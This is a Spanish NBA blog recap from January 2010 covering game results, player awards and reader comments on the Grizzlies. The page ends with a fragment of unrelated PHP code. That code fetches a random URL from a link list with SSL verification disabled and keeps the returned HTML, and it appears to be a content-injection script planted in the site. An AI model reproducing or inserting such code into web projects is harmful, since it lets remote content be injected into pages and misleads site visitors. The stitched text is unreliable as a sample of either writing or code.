La Crónica (03/01/2010)

03 de January de 2010 por TheDeerHunter

Mencionábamos ayer a los sorprendentes Grizzlies y anoche se doctoraron en la complicadísima cancha del Airways Center en Phoenix. Los “Osetes” no les dejaron ni la más mínima opción a los locales, llegando a acumular ventajas de hasta casi 40 puntos. El juego interior con Marc&Zach y Mayo+Sam Young por fuera hicieron en todo momento lo que les vino en gana. Cuidado porque del 21-13 de unos competitivos Suns al 16-16 que marcan los Grizzlies fuera de postemporada no hay tanta diferencia.

Y es que la guerra en el oeste está desatada. Los Thunder “tropezaron” ayer en Milwaukee en la prórroga. Durant no estuvo fino para ganar el partido en el periodo reglamentario y Redd y Ridnour se llevaron el gato al agua. Aún así adelantan a los Jazz que se suicidaron a base de pérdidas (hasta 25) contra unos Nuggets sin Billups ni Melo. Eso sí, Ty Lawson ejerció de mariscal y  el superior banco de Denver marcó la diferencia.

De momento se escapan de la quema los Mavs, que ganaron bastante fácil a unos Kings un tanto desfogados y que se están empezando a descolgar de la lucha por tanta eventualidad. También los Spurs que no tuvieron demasiadas dificultades de doblegar a los Wizards del vaquero Arenas. Se colocan terceros los de Popovic.

Po su parte los Blazers lograron una importantísima victoria frente los Warriors y aguantan bien el ataque de los perseguidores. Y por si eran pocos, parió la abuela y los Hornets se meten en la pomada sin saber muy bien cómo, jugando bastante mal pero con un CP3 casi milagroso. Ayer tumbaron a los Rockets, que no es moco de pavo.

En el Este la cosa está también emocionante pero por incomparecencia del personal. Los Cavs, más o menos bien, no fallan. Anoche frente los Nets. Los Celtics están en cuadro… pero hay que ver el pobre nivel de exigencia de la conferencia, en el que los sextos, Toronto, no son capaces de plantarles cara a prácticamente el equipo suplente de los verdes.

Y Orlando batacazo padre en Chicago. Con unos Bulls defendiendo como gatos panza arriba la cabeza de su coach. No puede ser que Dwight Howard lance menos que hasta 14 jugadores que había anoche en cancha. Para colmo de males Vince se lesionó… aunque para lanzar un 3 de 15 mejor se hubiera quedado en casa descansando.

Los Heat también se muestran flojos (como son en realidad, no nos engañemos). Anoche, en casa, perdieron contra unos Bobcats muy superiores, que se meten en plaza de postemporada. Finalmente Indiana ganó a Minnesotta en el único choque sin trascendencia de la noche.

PREMIOS

MVP: Como siempre podemos mencionar a LeBron aunque fue contra los Nets. Roy registró un 37-6-5  pero como es casi una obligación salirse contra los Warriors, el premio se lo daremos esta vez a Stephen Jackson con 35 puntos 8 rebotes en la cómoda victoria de los Bobcats en Miami.

El rookie: Ni Tyreke ni Jennings jugaron excesivamente bien. Es noticia que se lo demos a Ty Lawson, que se lució en Salt Lake City ante el mismísimo Deron Williams, haciendo de Chancey Billups. 23 puntos, 9 asistencias, 2 rebotes y 3 robos para este pedazo de proyecto.

La sorpresa: La sorpresa de la jornada la ilustra mejor que nadie Sam Young, de los Memphis Grizzlies, mostrándose indefendible (al menos por los Suns) con 22ptos, 4 rebotes, 2 asistencias y 1 robo en 20 minutitos de juego. También pudimos disfrutar de 20 minutitos de Thabeet, haciendo lo que mejor sabe (dar tapones y coger rebotes)

La decepción: El 3 de 7 en lanzamiento de Dwight Howard es una marca completamente indigna de un candidato al anillo como es él. Vince lanzó horripilantemente mal… y no se cortó de hacerlo más del doble de veces que él.

El mayor esfuerzo en vano: 31 puntazos de Durant que se fueron al limbo. Tenía la victoria en la mano… pero se le escapó. Qué importante hubiera sido para ellos.

Comenta

4 comentarios a esta entrada

  1. pcerezo dice:
    #1

    Si me dicen que a estas alturas los Memphis están al 50% no me lo creo…Tremenda su temporada. En el Este serían quintos.

    Analizando su quinteto es tremendo y tal como apunta Daimile en su blog si hubiesen elegido a Ricky….
    Zach Randolph tiene número de All Star…

    Un saludo,
    Pablo

      Citar

  2. Viva_Dirk dice:
    #2

    No nos liemos, fueron Ricky y su representante los que dijeron que no queria ir a Memphis. Si hubiesen fichado a Andre Miller si habria mejorado bastante, lo que les hace falta ahora mismo es exactamente lo que aporta Miller.

    Y deberian intentar traspasar a Rudy Gay acompañado de algun contrato, es el momento.

      Citar

  3. pcerezo dice:
    #3

    Está claro, el problema fue su representante y la mala prensa que Memphis tenía en España, pero hubiese sido (ahora es un poco ventajista) el mejor destino.

    Pero no me digáis que no son una grata sorpresa y además ahora sí que mola verlos…

    Pablo

      Citar

  4. Tobal dice:
    #4

    Lo de los Grizzlies,es un espectáculo genial el que estan dando,ganando en una cancha tan dificil como la de los Suns,anotando la friolera de 128 puntos,yo ya lo dije hace unas semanas,que este equipo iba a dar más de un susto,porque ahora mismo están en un momento dulce y la pareja interior Marc Gasol-Zach Randolph es ahora mismo de las mejores de la NBA,me alegro mucho que le vaya bien a los Grizzlies,es una franquicia a la que tengo simpatía

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>